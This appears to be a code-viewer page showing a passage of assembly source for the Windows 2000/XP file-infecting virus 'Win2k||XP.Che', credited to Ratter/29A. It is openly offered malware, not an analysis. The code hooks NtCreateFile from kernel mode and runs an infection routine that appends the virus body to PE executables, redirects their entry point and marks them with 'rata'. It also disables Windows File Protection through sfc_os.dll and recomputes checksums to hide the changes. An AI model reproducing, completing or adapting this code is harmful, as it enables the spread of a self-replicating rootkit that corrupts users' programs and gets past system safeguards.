📄 29a-7.002
字号:
push -1
mov eax, 12345678h
allocate_virtual_memory equ $-4
call eax
test eax, eax
jnz new_ntcreatefile_infect_end
mov edx, dword ptr [base_address]
lea eax, [edx+1028+(infect_routine-driver_entry)]
mov dword ptr [edx], eax
lea edi, [edx+1024+4]
push esi
lea esi, [esi+driver_entry] ; copy the to user-mode
push che_end-driver_entry
pop ecx
rep movsb
pop esi
lea edi, [edx+12]
mov ebx, 1016
xor edx, edx
mov eax, dword ptr [ebp+4+cPushad+4+8]
mov ecx, dword ptr [eax+4]
jecxz new_createfile_infect_no_roothandle
sub edi, 8
add ebx, 8
lea eax, [pobject]
push edx
push eax
push edx
push edx
push edx
push ecx ; roothandle
mov eax, 12345678h
reference_object_by_handle equ $-4
call eax
test eax, eax
jnz new_ntcreatefile_infect_end_free_mem
lea eax, [bytes_returned]
push eax
push ebx
push edi ; allocated mem in the process
push dword ptr [pobject]
mov eax, 12345678h
query_name_string equ $-4
call eax
push eax
push dword ptr [pobject]
mov eax, 12345678h
dereference_object equ $-4
call eax
pop eax
test eax, eax
jnz new_ntcreatefile_infect_end_free_mem
movzx ecx, word ptr [edi]
lea edi, [edi+ecx+8]
sub ebx, ecx
sub ebx, 2
jl new_ntcreatefile_infect_end_free_mem
xor eax, eax
mov al, '\'
stosw
new_createfile_infect_no_roothandle:
; now copy the normal name to the buffer
mov eax, dword ptr [ebp+4+cPushad+4+8]
mov edx, dword ptr [eax+8]
movzx ecx, word ptr [edx]
sub ebx, ecx
jle new_ntcreatefile_infect_end_free_mem
shr ecx, 1
push esi
mov esi, dword ptr [edx+4]
rep movsw
pop esi
mov eax, 12345678h
kernel_callback_table equ $-4
mov edx, [base_address]
sub edx, eax
shr edx, 2
lea ecx, [ecx_on_return]
push ecx
lea eax, [edx_on_return]
push eax
push 0
lea eax, [edx_on_return]
push eax ; stack start
push edx
mov eax, 12345678h
ke_user_mode_callback equ $-4
call eax
new_ntcreatefile_infect_end_free_mem:
push MEM_DECOMMIT
lea eax, [allocation_size]
push eax
lea eax, [base_address]
push eax
push -1
mov eax, 12345678h
free_virtual_memory equ $-4
call eax
new_ntcreatefile_infect_end:
leave
; locked
new_ntcreatefile_end_unlock:
btr dword ptr [esi+_lock_], 0
new_ntcreatefile_end:
popad
mov eax, 12345678h
old_ntcreatefile equ $-4
jmp eax
_lock_ dd 0
new_ntcreatefile endp
; infection routine based on Billy Belcebu Aztec virus
; well the code is not very nice, but it worx fine and i have
; better things to do than coding infection routines :)
infect_routine proc near
local file_name:DWORD
local file_attribz:DWORD
local file_handle:DWORD
local file_size:DWORD
local file_size_high:DWORD
local mapping_handle:DWORD
local map_address:DWORD
local new_file_size:DWORD
pushad
@SEH_SetupFrame <jmp infect_routine_end>
@gimme_delta
xchg eax, esi
and dword ptr [esi+_lock_], 0
lea edx, [esi+driver_entry-1024+8]
cmp dword ptr [edx], 003f005ch
jnz infect_routine_end
cmp dword ptr [edx+4], 005c003fh
jnz infect_routine_end
add edx, 8
mov dword ptr [file_name], edx
push edx
push edx
call dword ptr [esi+getfileattributes]
mov dword ptr [file_attribz], eax
pop edx
call sfp_exception
push 80h
push edx
call dword ptr [esi+setfileattributes]
call open_file
inc eax
jz infect_routine_end_restore_attribz
dec eax
mov dword ptr [file_handle], eax
lea edx, [file_size_high]
push edx
push eax
call dword ptr [esi+getfilesize]
mov dword ptr [file_size], eax
cmp dword ptr [file_size_high], 0
jnz infect_routine_end_closehandle
xchg eax, ecx
push ecx
call create_mapping
pop ecx
test eax, eax
jz infect_routine_end_closehandle
mov dword ptr [mapping_handle], eax
call map_file
test eax, eax
jz infect_routine_end_close_mapping
mov dword ptr [map_address], eax
cmp word ptr [eax], "ZM"
jnz infect_routine_end_unmap_file
mov ebx, dword ptr [eax+3ch]
add ebx, eax
cmp dword ptr [ebx], "EP"
jnz infect_routine_end_unmap_file
cmp dword ptr [ebx+4ch], "rata"
jz infect_routine_end_unmap_file
push dword ptr [ebx+3ch]
push eax
call dword ptr [esi+unmapviewoffile]
push dword ptr [mapping_handle]
call dword ptr [esi+closehandle]
pop ecx
mov eax, dword ptr [file_size]
add eax, che_end-driver_entry
call _align_
xchg eax, ecx
mov dword ptr [new_file_size], ecx
push ecx
call create_mapping
pop ecx
test eax, eax
jz infect_routine_end_closehandle
mov dword ptr [mapping_handle], eax
call map_file
test eax, eax
jz infect_routine_end_close_mapping
mov dword ptr [map_address], eax
mov ebx, dword ptr [eax+3ch]
add ebx, eax
mov edi, ebx
movzx eax, word ptr [edi+06h]
dec eax
imul eax, eax, 28h
add ebx, eax
add ebx, 78h
mov edx, dword ptr [edi+74h]
shl edx, 3
add ebx, edx
mov eax, dword ptr [edi+28h]
mov dword ptr [esi+host_start_addr], eax
mov edx, dword ptr [ebx+10h]
mov eax, edx
add edx, dword ptr [ebx+14h]
push edx
add eax, dword ptr [ebx+0ch]
mov dword ptr [edi+28h], eax
mov dword ptr [esi+new_eip], eax
mov eax, dword ptr [ebx+10h]
add eax, che_end-driver_entry
mov ecx, dword ptr [edi+3ch]
call _align_
mov dword ptr [ebx+10h], eax
mov dword ptr [ebx+08h], eax
add eax, dword ptr [ebx+0ch]
mov dword ptr [edi+50h], eax
or dword ptr [ebx+24h], 0A0000020h
mov dword ptr [edi+4ch], "rata"
pop edi
add edi, dword ptr [map_address]
push esi
lea esi, [esi+driver_entry]
mov ecx, che_end-driver_entry
rep movsb
pop esi
call count_correct_checksum
infect_routine_end_unmap_file:
push dword ptr [map_address]
call dword ptr [esi+unmapviewoffile]
infect_routine_end_close_mapping:
push dword ptr [mapping_handle]
call dword ptr [esi+closehandle]
infect_routine_end_closehandle:
push dword ptr [file_handle]
call dword ptr [esi+closehandle]
infect_routine_end_restore_attribz:
push dword ptr [file_attribz]
push dword ptr [file_name]
call dword ptr [esi+setfileattributes]
infect_routine_end:
@SEH_RemoveFrame
popad
leave
retn
open_file:
xor eax, eax
push eax
push eax
push OPEN_EXISTING
push eax
push eax
push GENERIC_READ or GENERIC_WRITE
push dword ptr [file_name]
call dword ptr [esi+createfilew]
retn
create_mapping:
xor eax, eax
push eax
push ecx
push eax
push PAGE_READWRITE
push eax
push dword ptr [file_handle]
call dword ptr [esi+createfilemapping]
retn
map_file:
xor eax, eax
push ecx
push eax
push eax
push FILE_MAP_READ or FILE_MAP_WRITE
push dword ptr [mapping_handle]
call dword ptr [esi+mapviewoffile]
retn
_align_:
push edx
xor edx, edx
push eax
div ecx
pop eax
sub ecx, edx
add eax, ecx
pop edx
retn
count_correct_checksum:
pushad
@pushsz "imagehlp.dll"
call dword ptr [esi+loadlibrary]
test eax, eax
jz count_correct_checksum_end
xchg eax, ebx
push 0cf6736bbh
call gimme_api
test eax, eax
jz count_correct_checksum_end
xchg eax, edi
mov edx, dword ptr [map_address]
mov eax, dword ptr [edx+3ch]
add eax, edx
lea eax, [eax+58h]
push eax
@pushvar <dd ?>
push dword ptr [new_file_size]
push edx
call edi
push ebx
call dword ptr [esi+freelibrary]
count_correct_checksum_end:
popad
retn
sfp_exception:
pushad
mov edi, edx
@pushsz "sfc_os.dll"
call dword ptr [esi+loadlibrary]
test eax, eax
jz sfp_exception_end
xchg eax, ebx
push 5
push ebx
call dword ptr [esi+getprocaddress]
test eax, eax
jz sfp_exception_end_free_library
push -1
push edi
push 0
call eax
sfp_exception_end_free_library:
push ebx
call dword ptr [esi+freelibrary]
sfp_exception_end:
popad
retn
createfilew dd ?
closehandle dd ?
loadlibrary dd ?
getprocaddress dd ?
freelibrary dd ?
getfileattributes dd ?
setfileattributes dd ?
createfilemapping dd ?
mapviewoffile dd ?
unmapviewoffile dd ?
getfilesize dd ?
infect_routine endp
db 0, " Win2k||XP.Che by Ratter/29A ", 0
db 0, "_-=Dedicated to Trent Reznor=-_", 0
db 0, " In Czech Republic, 2003 ", 0
che_end equ $
.code
host_start:
mov eax, STATUS_DRIVER_INTERNAL_ERROR
retn 8
end driver_entry
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -